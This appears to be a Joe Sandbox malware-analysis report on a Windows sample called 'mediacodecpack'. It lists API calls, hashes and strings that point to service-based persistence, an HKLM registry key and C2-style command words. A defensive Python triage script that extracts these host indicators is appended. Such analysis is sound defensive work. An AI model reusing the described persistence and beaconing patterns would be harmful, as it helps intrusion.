                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                            • API String ID: 3337033272-2823103634
                                                                                            • Opcode ID: e6e5016ebdc7090a6d01bddd9a6ba44a3fd94803498a3ed13d9d65c77a6c3122
                                                                                            • Instruction ID: a89ee1b9319bfd80b77b87fa5aab58741eba43b193dfb644bb11ec977cf00533
                                                                                            • Opcode Fuzzy Hash: e6e5016ebdc7090a6d01bddd9a6ba44a3fd94803498a3ed13d9d65c77a6c3122
                                                                                            • Instruction Fuzzy Hash: B71205315483819BE7249B24E854BAB7BE5EF86714F14481DE5CA97381EF70DC48CBA2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D11
                                                                                            • GetLastError.KERNEL32 ref: 02D41D23
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D59
                                                                                            • GetLastError.KERNEL32 ref: 02D41D6B
                                                                                            • __beginthreadex.LIBCMT ref: 02D41DB1
                                                                                            • GetLastError.KERNEL32 ref: 02D41DC6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D41DDD
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D41DEC
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41E14
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D41E1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                            • API String ID: 831262434-3017686385
                                                                                            • Opcode ID: 0dc9ad2c3fe5ec6bd7960a7ced2eb3cfa91965de6bd7e9f8c711f8dd2fa04c3a
                                                                                            • Instruction ID: 2b628efc88e92470e054e2de7769949afe981fedce5d7cf55e87f450f782bb8b
                                                                                            • Opcode Fuzzy Hash: 0dc9ad2c3fe5ec6bd7960a7ced2eb3cfa91965de6bd7e9f8c711f8dd2fa04c3a
                                                                                            • Instruction Fuzzy Hash: 47313975A043119FD700EF24D888B2BBBA5EF84750F104969F9599B390DB70DD89CBE2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44D8B
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D44DB7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D44DC3
                                                                                              • Part of subcall function 02D44BED: __EH_prolog.LIBCMT ref: 02D44BF2
                                                                                              • Part of subcall function 02D44BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D44E93
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D44E99
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D44EA0
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D44EA6
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D450A7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D450AD
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D450B8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D450C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 2062355503-0
                                                                                            • Opcode ID: b87d01774742d521eaf2d28f1583f6c57983a27eb51384af91172566d9397456
                                                                                            • Instruction ID: 094774e7e4856020b38d3e7f37b3570458b032dfb54c2a8f17022c72cb1003d5
                                                                                            • Opcode Fuzzy Hash: b87d01774742d521eaf2d28f1583f6c57983a27eb51384af91172566d9397456
                                                                                            • Instruction Fuzzy Hash: EFB14871D0025EDFEF11DFA0D854BEEBBB5AF14318F24405AE40566280DBB56E89CFA1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 735 401301-40135e FindResourceA 736 401360-401362 735->736 737 401367-40137d SizeofResource 735->737 738 401538-40153c 736->738 739 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 737->739 740 40137f-401381 737->740 745 401407-40140b 739->745 740->738 746 40140d-40141d 745->746 747 40141f-401428 GetTickCount 745->747 746->745 749 401491-401499 747->749 750 40142a-40142e 747->750 751 4014a2-4014a8 749->751 752 401430-401438 750->752 753 40148f 750->753 754 4014f0-401525 GlobalAlloc call 401000 751->754 755 4014aa-4014e8 751->755 756 401441-401447 752->756 753->754 763 40152a-401535 754->763 757 4014ea 755->757 758 4014ee 755->758 760 401449-401485 756->760 761 40148d 756->761 757->758 758->751 764 401487 760->764 765 40148b 760->765 761->750 763->738 764->765 765->756
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3019604839-3916222277

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63173), ref: 02D42738
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID: timer
                                                                                            • API String ID: 4293676635-1792073242

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1633115879-0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02D46104
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46120
                                                                                            Strings
                                                                                            • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D46129
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveSleep
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                            • API String ID: 1566154052-1923541051

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 00402A46
                                                                                              • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                            • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                              • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2057626494-0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42EEE
                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42EFD
                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42F0C
                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D42F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 2093263913-0
                                                                                            APIs
                                                                                              • Part of subcall function 02D42D39: WSASetLastError.WS2_32(00000000), ref: 02D42D47
                                                                                              • Part of subcall function 02D42D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42E6D
                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D42E83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Sendselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 2958345159-280543908
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42AEA
                                                                                            • connect.WS2_32(?,?,?), ref: 02D42AF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 374722065-280543908
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02D436A7
                                                                                              • Part of subcall function 02D42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D42432
                                                                                              • Part of subcall function 02D42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
                                                                                              • Part of subcall function 02D42420: RtlEnterCriticalSection.NTDLL(?), ref: 02D42454
                                                                                              • Part of subcall function 02D42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42469
                                                                                              • Part of subcall function 02D42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D42470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1601054111-0
APIs
• __beginthreadex.LIBCMT ref: 02D51116
• CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D4998D,00000000), ref: 02D51147
• ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D4998D,00000000), ref: 02D51155
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: CloseHandleResumeThread__beginthreadex
• String ID:
• API String ID: 1685284544-0
• Opcode ID: 681607191bdcd1bc299403dcee6253d375754d5bbc5e8309c63f73bad7df1da5
• Instruction ID: ab29b56209df4d0226879f2a124164167fcea33e22e51c7173e77d6d598d60be
• Opcode Fuzzy Hash: 681607191bdcd1bc299403dcee6253d375754d5bbc5e8309c63f73bad7df1da5
• Instruction Fuzzy Hash: AAF068712402209BEF209E6DDC84F9573E8EF59725F24055AF958D7380D7F1EC92DAA0
APIs
• InterlockedIncrement.KERNEL32(02D7529C), ref: 02D41ABA
• WSAStartup.WS2_32(00000002,00000000), ref: 02D41ACB
• InterlockedExchange.KERNEL32(02D752A0,00000000), ref: 02D41AD7
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: Interlocked$ExchangeIncrementStartup
• String ID:
• API String ID: 1856147945-0
• Opcode ID: 319a0b355634630ee3a16eff674fd26043646c9042825168f9de3f600fbe473a
• Instruction ID: cca69746da385d066493b780368b6fbd9e5a7d1e6fd8517881afad385d61b314
• Opcode Fuzzy Hash: 319a0b355634630ee3a16eff674fd26043646c9042825168f9de3f600fbe473a
• Instruction Fuzzy Hash: 50D05E31D842046BE220A6A0BD0FA78776CD706712FD00651FDA9C43C0FB56AD6485B7
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d78000_mediacodecpack.jbxd
Similarity
• API ID: InternetOpen
• String ID: U[6
• API String ID: 2038078732-2089642770
• Opcode ID: 74da67eaa6ebd9f137a0526b111bac0b6f96ce9a99c4b638681b4f9a7c64e92d
• Instruction ID: 6b2254798370ccc988f216abcc2e3bde10454e51875f21c49ea57f50c2e2faf8
• Opcode Fuzzy Hash: 74da67eaa6ebd9f137a0526b111bac0b6f96ce9a99c4b638681b4f9a7c64e92d
• Instruction Fuzzy Hash: FC514FB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE7D583700D63558548A97
APIs
• GetStartupInfoA.KERNEL32(0040BC70), ref: 0040D55C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: InfoStartup
• String ID: 3h
• API String ID: 2571198056-227859408
• Opcode ID: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
• Instruction ID: 03e41e0e2fbe8f3f1350c05a2512de981e85b09ededd3a12d9f5b7d8ff28fd69
• Opcode Fuzzy Hash: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
• Instruction Fuzzy Hash: 604117B1908246CBD7149B68DE313E677B0E702321F14423E9553B31E2D77C444AEB5E
APIs
• RegCreateKeyExA.KERNELBASE(80000002,Software\MCodec56,00000000), ref: 0040DC43
Strings
Memory Dump Source
• Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Create
• String ID: Software\MCodec56
• API String ID: 2289755597-4241566752
• Opcode ID: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
• Instruction ID: 93077888e0bbcd1fcb5d665c645348ae1621a215fb68b31d801dbfa4ad4509b8
• Opcode Fuzzy Hash: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
• Instruction Fuzzy Hash: 2CD0A931A9C20AB8F2002A924D0EB721514B708B94F60083B2452B30C6C2B8844BD25B
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Close
• String ID: MediaCodecPack
• API String ID: 3535843008-199385074
• Opcode ID: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
• Instruction ID: f19db8fe7a91f9339945a850f06442911a31ce16223db01261e704d0ab5d2cd6
• Opcode Fuzzy Hash: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
• Instruction Fuzzy Hash: B4B01221A4C510D7E5282BD05B09D6E34015544720732003B7683391E34FFD040B73EF
APIs
• __EH_prolog.LIBCMT ref: 02D44BF2
  • Part of subcall function 02D41BA7: __EH_prolog.LIBCMT ref: 02D41BAC
  • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41BBC
  • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
  • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41C13
  • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41C56
  • Part of subcall function 02D4D0FC: __EH_prolog.LIBCMT ref: 02D4D101
  • Part of subcall function 02D4D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4D180
• InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
• String ID:
• API String ID: 1927618982-0
• Opcode ID: 71433e242f401b3064b9ccc4d83d63b46ab37b7d34f154bf4ed2e4f92919344c
• Instruction ID: 4ab88320fc124bc39eb0e14493d58532201a9c776593b30aa0e6bd51c08a2244
• Opcode Fuzzy Hash: 71433e242f401b3064b9ccc4d83d63b46ab37b7d34f154bf4ed2e4f92919344c
• Instruction Fuzzy Hash: 29510571D04248DFDB15DFA8C485AEEBBB5EF18314F24819AE905AB351EB709E44CF60
APIs
• WSASetLastError.WS2_32(00000000), ref: 02D42D47
• WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
  • Part of subcall function 02D4950D: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4951B
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Send
• String ID:
• API String ID: 1282938840-0
• Opcode ID: a9a2c466d591c41936d6ea93cb07a4f464fbc7b48a7f79345c5f09243c5bb694
• Instruction ID: 5e90164b0efc144c64a247a21514934d4d518dbf5b9674f274e80e4268935d43
• Opcode Fuzzy Hash: a9a2c466d591c41936d6ea93cb07a4f464fbc7b48a7f79345c5f09243c5bb694
• Instruction Fuzzy Hash: 6C0184B5900205EFD7205F95D85896BBBEDEF453A4B20052EF89983300DF749D40CBB1
APIs
Memory Dump Source
• Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: CloseValue
• String ID:
• API String ID: 3132538880-0
• Opcode ID: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
• Instruction ID: 4c22f98cd7c9e98f077693477baae5e06b4a06b3414cbbd33dac7c18dcee98c1
• Opcode Fuzzy Hash: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
• Instruction Fuzzy Hash: 34018C7541A5918FC709CB24AFB06A93FB5D64A740705107DD1D6AB273D6384C05EB1D
APIs
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
• lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
Strings
Memory Dump Source
• Source File: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
Similarity
• API ID: CtrlDispatcherServiceStartlstrcmpi
• String ID: /chk
• API String ID: 369133424-3837807730
• Opcode ID: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
• Instruction ID: 9673a0ded5c8b983d3e052be02671165733424ab24c3791a3204680fb7a92e49
• Opcode Fuzzy Hash: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
• Instruction Fuzzy Hash: 1DF02434A08356DFDB058BA089146967BB4FB02310B0580FFC486EA197C7388806DF49
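Two of the functions in this listing carry the host-side indicators an incident responder would pull out first: the RegCreateKeyExA call whose first argument is 80000002, which is the documented constant for HKEY_LOCAL_MACHINE (so `Software\MCodec56` is created under HKLM, which requires elevated rights), and the StartServiceCtrlDispatcherA function that also compares a string against `/chk`, the entry pattern of a Windows service image. The script below is an added example, not code from the Joe Sandbox report or from the sample: it parses API lines in the exact shape printed on this page, decodes the HKEY root, and buckets calls by behaviour. The report lines embedded in it are copied from this page as constructed input, the bucket names are the editor's own grouping, and reading `/chk` as a command-line switch is an assumption.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.

Added example, not part of the Joe Sandbox report or of the analysed sample.
It parses API lines as printed on this page, decodes the HKEY root constant
that the sandbox shows as a raw hex argument, and groups calls into the
behaviours worth checking on a host (registry writes, service registration,
command-line switches, socket/network use).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: lines copied from the listing on this page (one
# subcall line and one call printed without an argument list, to exercise
# both variants the sandbox emits).
SAMPLE_LINES = r"""
• RegCreateKeyExA.KERNELBASE(80000002,Software\MCodec56,00000000), ref: 0040DC43
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
• lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
• WSAStartup.WS2_32(00000002,00000000), ref: 02D41ACB
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
• shutdown.WS2_32(?,00000002), ref: 02D47414
  • Part of subcall function 02D4950D: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4951B
• HeapDestroy.KERNEL32 ref: 00403BB4
"""

# Predefined registry root handles from winreg.h; the sandbox prints them as hex.
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

API_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<caller>[0-9A-Fa-f]+):\s*)?
        (?P<api>\w+)\.(?P<module>\w+)            # e.g. RegCreateKeyExA.KERNELBASE
        (?:\((?P<args>[^)]*)\))?                 # argument list is optional
        (?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?   # call-site address
    """,
    re.VERBOSE,
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set for "Part of subcall function X:" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API bullet in `text`; lines that are not API bullets are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = raw_args.split(",") if raw_args else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref") or "", m.group("caller")))
    return calls


def decode_hkey(token: str) -> Optional[str]:
    """Map a raw hex argument to a registry root name, or None if it is not one."""
    try:
        return HKEY_ROOTS.get(int(token, 16))
    except ValueError:  # '?' (unknown to the sandbox) or a string argument
        return None


# Editor's own grouping (assumption), not a Joe Sandbox category.
REGISTRY_CREATE_OPEN = {"RegCreateKeyExA", "RegCreateKeyExW",
                        "RegOpenKeyExA", "RegOpenKeyExW"}
SERVICE_APIS = {"StartServiceCtrlDispatcherA", "StartServiceCtrlDispatcherW",
                "CreateServiceA", "CreateServiceW"}
NETWORK_MODULES = {"WS2_32", "WININET", "WINHTTP"}


def triage(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Bucket parsed calls into the indicators worth checking on a host."""
    findings: Dict[str, List[str]] = {"registry": [], "service": [],
                                      "cmdline_switch": [], "network": []}
    for c in calls:
        if c.api in REGISTRY_CREATE_OPEN and len(c.args) >= 2:
            root = decode_hkey(c.args[0])
            if root:  # emit a full path only when the root handle is known
                findings["registry"].append(f"{root}\\{c.args[1]}")
        elif c.api in SERVICE_APIS:
            findings["service"].append(f"{c.api} @ {c.ref}")
        elif c.api.startswith("lstrcmp"):
            # A literal starting with '/' or '-' compared via lstrcmp* is read
            # here as a command-line switch checked at start-up (assumption).
            findings["cmdline_switch"].extend(a for a in c.args if a[:1] in ("/", "-"))
        if c.module in NETWORK_MODULES:
            findings["network"].append(c.api)
    return findings


if __name__ == "__main__":
    for category, items in triage(parse_api_lines(SAMPLE_LINES)).items():
        print(f"{category:15s} {items}")
```

Run as a script it prints the four buckets; the registry bucket resolves to `HKEY_LOCAL_MACHINE\Software\MCodec56`, which is the path to look for on a suspected host, and the network bucket lists the WS2_32 calls from the dumped region. Lines the sandbox prints with `?` arguments are kept but never decoded, so an unknown root handle does not produce a misleading path.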
APIs
